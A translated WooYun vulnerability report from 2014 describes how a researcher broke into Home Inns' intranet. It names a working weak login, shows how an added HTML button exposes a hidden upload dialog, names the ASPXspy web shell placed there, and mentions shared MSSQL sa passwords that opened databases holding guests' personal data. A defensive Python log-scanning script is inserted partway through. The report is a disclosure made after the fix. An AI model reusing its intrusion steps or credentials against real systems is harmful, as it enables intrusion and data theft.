
Vulnerability summary

Defect ID: wooyun-2014-051579

Title: See how I got into the Home Inns intranet (Did you check into a room today?)

Related vendor: Home Inns Hotel Group (如家酒店集团)

Vulnerability author: wefgod

Submitted: 2014-02-21 10:38

Fixed: 2014-04-07 10:43

Published: 2014-04-07 10:43

Vulnerability type: file upload leading to arbitrary code execution

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-02-21: details sent to the vendor, awaiting vendor handling
2014-02-21: vendor has confirmed; details disclosed to the vendor only
2014-03-03: details disclosed to core white hats and relevant domain experts
2014-03-13: details disclosed to regular white hats
2014-03-23: details disclosed to intern white hats
2014-04-07: details disclosed to the public

Brief description:

I've always felt that titles like "See how I..." are a bit too cocky, so today I went looking for one specifically to try the feeling for myself.
So far I've looked at 20-odd database servers. Did you check into a room today? You did? Then it can definitely be looked up. All kinds of user information... and it seems there is somewhere room rates could be changed? ... In short, the databases hold all sorts of things.

Detailed description:

The main cause is http://office.homeinns.com/hcs/. All sorts of weak passwords that log in without needing the ikey, no brute-force protection at all, not even a captcha...
Let's start with the hcs system.
The weak password zuods/zuods123 gets straight in (is this one of the bosses?)

image006.png


All sorts of sales staff?

image008.png


Open http://office.homeinns.com/hcs/Configure/Filesmanage.aspx

image010.png


Originally we don't see any file upload at all. Fine:
Look at the source first:

function UpTo()
{
    // pop up the window
    $('#Upinfo').dialog({autoOpen: false, modal: true, resizable: false, draggable: true, title: '文件上传', dialogClass: "login_dialog"});
    $('#ctl00_ContentPlaceHolder1_btnUpload').click(function () {
        $("#Upinfo").load('../Configure/UpFileLoad1.html').dialog('option', {'width': 600, 'height': 250, 'title': '文件上传'}).dialog('open');
        return false;
    });
}


Oh, so there is a file-upload dialog? How do we bring it up?
Add the following code at a suitable spot:
<input type="button" id="ctl00_ContentPlaceHolder1_btnUpload" value="Click" onclick="UpTo()" />

image012.png


After clicking it, the upload appears:

image013.png


Upload one!

image015.png


The download link gives the path directly:
http://office.homeinns.com/Hcs/uploadfiles/ASPXspy2.aspx
园长 recently reworked this one... the 2014 edition, check it out!
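Added example, not part of the report or of the hcs system: two log-side checks a defender could run over IIS W3C logs to catch the two things this report turns on, a server-executable file being served out of the upload directory (the ASPXspy2.aspx case above) and unthrottled login guessing against a form with no captcha. The log lines are constructed, and the login path /hcs/Login.aspx is an assumption since the report does not name it.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta
Entry = namedtuple("Entry", "ts ip method path status")
EXEC_EXT = {"aspx", "asp", "ashx", "asmx", "asax", "config", "php", "jsp"}  # never serve these from an upload dir
UPLOAD_DIR = "/uploadfiles/"    # upload path seen in the report (/Hcs/uploadfiles/), matched case-insensitively
LOGIN_PATH = "/hcs/login.aspx"  # ASSUMED login page of the hcs system; the report does not name it

# Constructed IIS W3C-style lines (date time c-ip cs-method cs-uri-stem sc-status); not from the report.
SAMPLE_LOG = """\
2014-02-20 09:00:15 10.0.0.5 GET /Hcs/uploadfiles/ASPXspy2.aspx 200
2014-02-20 09:01:00 10.0.0.9 GET /hcs/uploadfiles/notice.pdf 200
2014-02-20 09:01:30 10.0.0.9 GET /hcs/uploadfiles/photo.aspx.jpg 200
2014-02-20 09:05:00 10.0.0.7 POST /hcs/Login.aspx 200
2014-02-20 09:05:01 10.0.0.7 POST /hcs/Login.aspx 200
2014-02-20 09:05:02 10.0.0.7 POST /hcs/Login.aspx 200
2014-02-20 09:05:03 10.0.0.7 POST /hcs/Login.aspx 200
2014-02-20 09:30:00 10.0.0.9 POST /hcs/Login.aspx 200
"""

def parse_iis(text):
    """Parse the six-field layout above into time-ordered entries; '#Fields:' style comment lines are skipped."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        d, t, ip, method, path, status = line.split()[:6]
        entries.append(Entry(datetime.strptime(d + " " + t, "%Y-%m-%d %H:%M:%S"), ip, method, path, int(status)))
    return sorted(entries)

def executables_in_upload_dir(entries):
    """Rule 1: a file under the upload dir with an executable extension anywhere in its name (catches photo.aspx.jpg too)."""
    hits = []
    for e in entries:
        low = e.path.lower()
        name = low.rsplit("/", 1)[-1]
        if UPLOAD_DIR in low and EXEC_EXT & set(re.findall(r"\.([a-z0-9]+)", name)):
            hits.append(e.path)
    return hits

def login_bursts(entries, window=timedelta(seconds=60), threshold=4):
    """Rule 2: one client POSTs to the login page >= threshold times within window (no lockout, no captcha)."""
    per_ip = defaultdict(list)
    for e in entries:
        if e.method == "POST" and e.path.lower() == LOGIN_PATH:
            per_ip[e.ip].append(e.ts)  # already time-ordered because parse_iis sorted the entries
    return sorted(ip for ip, ts in per_ip.items()
                  if any(ts[i + threshold - 1] - ts[i] <= window
                         for i in range(len(ts) - threshold + 1)))
```

Rule 1 fires on the request itself, so it also catches a file that slipped past upload filtering by some route other than the hidden dialog; rule 2's window and threshold are starting points to tune against real traffic.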

image017.png


All sorts of "internal files"???

image019.png


image021.png


Intranet IPs.
Multiple MSSQL sa passwords leaked

image022.png


image024.png

Proof of vulnerability:

Let's look at the intranet. Some information below has been masked where appropriate.

Domain users:


First the 192.168.210.* segment:

image026.png


image027.png


image028.png


Anonymous FTP

image029.png


On top of that, many servers share the same sa password, more than 15 of them, so the databases can be dumped at will! They contain a great deal of user data, such as real names, ID-card numbers and passwords.

image030.png


image031.png


Let's look at what is inside the database servers.
192.168.210.35: user data. It's too sensitive, so I won't screenshot much of it, to avoid leaking information. The rest below also stops short, to avoid widening the damage.

image032.png


image034.png


image035.png


192.168.210.38: could I change room rates here?

image037.png


192.168.210.72

image039.png


192.168.210.65

image040.png


192.168.210.72

image041.png


192.168.210.251

image043.png


The 172.23.100.* segment:

image045.png


Multiple sa passwords:

image046.png


172.23.100.21:

image047.png


image049.png


172.23.100.109

image051.png


image053.png


Running as System, straight away:

image055.png


I won't go any further in detail. Other IPs actually have similar problems; I won't bother with them.

Fix recommendation:

Many different kinds of issue... do an overall analysis and see how to fix them.
Also, WooYun @疯狗 @xsser, could I get a 雷? It's been a long time since I got one.

Copyright notice: when reposting, please credit the source: wefgod@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-02-21 11:52

Vendor reply:

Thanks for your attention!!!

Latest status:

None yet